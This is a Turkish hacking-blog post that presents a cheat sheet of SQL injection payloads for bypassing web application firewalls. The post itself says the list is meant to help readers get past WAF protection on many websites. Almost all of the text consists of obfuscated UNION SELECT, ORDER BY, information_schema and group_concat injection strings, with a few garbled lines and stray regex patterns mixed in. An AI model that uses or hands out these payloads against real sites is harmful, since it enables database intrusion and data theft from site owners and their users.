SQL WAF BYPASS

WAF BYPASSMerhaba Sevgili HackerHub Takipçileri İnternet Üzerindeki Bir Çok Kaynağı Araştırarak Manuel Olarak SQL BYPASS Yapanların İşine Yarayacak WAF BYPASS Komutlarını Sizlere Paylaşıyoruz! Pek Çok Web Sitesinde Karşılaştıgınız WAF Korumasını Bypass Etmenize Yardım Edecektir.

ORDER BY


/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/UNION SELECT


/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
information_schema.tables 


/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table


Concat


CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))
Group Concat


/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)

0 Yorumlar

Yorum Gönder

Post a Comment (0)

Daha yeni Daha eski

Oyun Hileleri Hack Haber